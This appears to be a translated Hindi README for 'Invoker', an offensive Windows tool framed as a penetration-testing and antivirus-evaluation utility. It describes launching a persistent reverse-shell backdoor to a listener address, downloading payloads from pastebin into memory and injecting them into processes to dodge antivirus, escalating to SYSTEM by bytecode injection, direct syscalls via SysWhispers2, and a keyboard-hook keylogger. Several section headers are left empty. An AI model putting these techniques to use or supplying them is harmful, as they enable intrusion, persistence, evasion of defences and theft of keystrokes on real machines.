
पेनिट्रेशन टेस्टिंग उपयोगिता और एंटीवायरस मूल्यांकन उपकरण।
पेनिट्रेशन टेस्टिंग उपयोगिता और एंटीवायरस मूल्यांकन उपकरण।
Visual Studio Community 2022 v17.5.4 (64-bit) के साथ निर्मित और Windows 10 Enterprise OS (64-bit) पर परीक्षण किया गया।
शैक्षिक उद्देश्यों के लिए बनाया गया। मुझे उम्मीद है कि यह मदद करेगा!
इस रिपॉजिटरी में ज्ञात सिग्नेचर होने लगे हैं और मेरे पास हर बार नई एक्जीक्यूटेबल अपलोड करने का समय नहीं है, इसलिए आपको इस प्रोजेक्ट को स्वयं कंपाइल करना चाहिए।
उपयोगी वेबसाइटें:
करने के लिए:
NtCreateProcessEx 32-बिट प्रक्रियाओं के साथ अच्छी तरह से काम नहीं करता है।भविष्य की योजनाएँ:
कोडिंग करते समय मैं ध्यान में रखता हूँ:
उपरोक्त सभी के परिणामस्वरूप आपके PE का आकार छोटा होगा और पहचान दर कम होगी।
विशेषताएँ:
Invoker लाइब्रेरी यहाँ देखें। इसका उपयोग करने में संकोच न करें!
कुछ सुविधाओं के लिए प्रशासनिक विशेषाधिकार की आवश्यकता हो सकती है।
कुछ सुविधाएँ Windows XP और पुराने पर काम नहीं कर सकती हैं क्योंकि कुछ विशिष्ट एक्सेस अधिकार और नियंत्रण फ्लैग का उपयोग किया गया है।
Invoker_x86.exe (32-bit) या Invoker_x64.exe (64-bit) चलाएं।
परसिस्टेंस जोड़ते हुए रिवर्स शेल बैकडोर को स्वचालित करने के लिए, निम्न कमांड चलाएं:
Invoker_x64.exe 192.168.8.5:9000
32-bit इनवोकर कर सकता है:
64-bit इनवोकर कर सकता है:
ध्यान दें कि प्रत्येक इंजेक्शन तकनीक के अपने फायदे और नुकसान हैं; जैसे, कुछ तकनीक को कम एक्सेस अधिकारों की आवश्यकता होती है, कम संदिग्ध विधियों का उपयोग करती है, आदि, लेकिन हो सकता है कि वह प्रक्रिया को क्रैश कर दे, पेलोड को निष्पादित करने के लिए कुछ समय और अन्य विशेष शर्तों की आवश्यकता हो, आदि।
ध्यान दें कि कुछ C2C इम्प्लांट मेमोरी जारी करने के बाद काम नहीं कर सकते हैं। उस स्थिति में, VirtualFreeEx, NtFreeVirtualMemory, आदि जैसी विधियों को कमेंट आउट करें।
उच्च-विशेषाधिकार वाली प्रक्रिया में बाइटकोड इंजेक्ट करके विशेषाधिकार बढ़ाएं।
यह उपकरण मेमोरी में बाइनरी फ़ाइल की सामग्री डाउनलोड कर सकता है और इसे चालू प्रक्रिया में इंजेक्ट कर सकता है। यह HTTP प्रतिक्रिया को पार्स भी कर सकता है और कस्टम तत्व से पेलोड निकाल सकता है, जैसे <invoker>payload</invoker> से जहाँ payload Base64 में एनकोडेड बाइनरी कोड है।
उदाहरण pastebin.com/raw/xf9Trt0d पर देखें।
यह उपयोगी है यदि एंटीवायरस लगातार आपके स्थानीय पेलोड को हटा रहा है।
एक अतिरिक्त उदाहरण pastebin.com/raw/iW17rCxH पर देखें - इमेज तत्व में छिपा पेलोड।
P.S. प्रदान किए गए बाइटकोड निश्चित रूप से आपके लिए काम नहीं करेंगे।
ngrok का उपयोग करके अपने स्थानीय वेब सर्वर को सार्वजनिक पता दें।
यह देखने के लिए कि कोई प्रक्रिया 32-bit है या 64-bit, Task Manager खोलें -> More details पर क्लिक करें -> Details टैब पर जाएं -> किसी भी कॉलम पर राइट क्लिक करें -> Select columns पर क्लिक करें -> Platform चेकबॉक्स को चेक करें।
यह देखने के लिए कि क्या कोई प्रक्रिया प्रशासनिक विशेषाधिकार के साथ चल रही है, Elevated चेकबॉक्स को चेक करें।
मेरे अन्य प्रोजेक्ट से रिवर्स शेल पेलोड जनरेट करने का तरीका जानें, साथ ही Ncat और multi/handler लिसनर सेट अप करना सीखें।
बाइटकोड इंजेक्शन विफल हो सकता है क्योंकि बाइटकोड में खराब कैरेक्टर, गलत एग्जिट फंक्शन या एन्कोडिंग हो सकती है; DLL इंजेक्शन अधिक विश्वसनीय है।
यदि आप Invoker से PowerShell रिवर्स या बाइंड शेल चलाना चाहते हैं, तो Invoker खोलें और PowerShell सत्र शुरू करें, फिर कोई भी one-liner चलाएं (मेरे अन्य प्रोजेक्ट से)।
डायरेक्ट सिस्टम कॉल्स लाइब्रेरी और असेंबली SysWhispers2 के साथ उत्पन्न की गई थीं। लेखक को श्रेय!
समान लाइब्रेरी और असेंबली उत्पन्न करने के लिए, अपने पसंदीदा कंसोल से निम्न कमांड चलाएं:
python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls
लाइब्रेरी और असेंबली के आसपास मेरा रैपर यहाँ देखें। इसका उपयोग करने में संकोच न करें!
सरल DLL को हुक प्रक्रिया के साथ यहाँ देखें। हुक प्रक्रिया प्रत्येक विंडो बंद होने पर एक मैसेज बॉक्स को आमंत्रित करेगी।
कीबोर्ड हुक प्रक्रिया (अर्थात कीलॉगर) यहाँ देखें।
माउस हुक प्रक्रिया जो पहले माउस क्लिक पर एक नई प्रक्रिया चलाएगी, यहाँ देखें।
परीक्षण समाप्त करने के बाद सभी निर्मित आर्टिफैक्ट को हटाना न भूलें, जैसे keylogger.log हटाएं, आदि।
इन सरल चरणों का पालन करें:
whoami चलाएं, अब आपको nt authority\system दिखना चाहिए।
चित्र 1 - इनवोकर

चित्र 2 - बाइटकोड इंजेक्शन

चित्र 3 - उन्नत विशेषाधिकार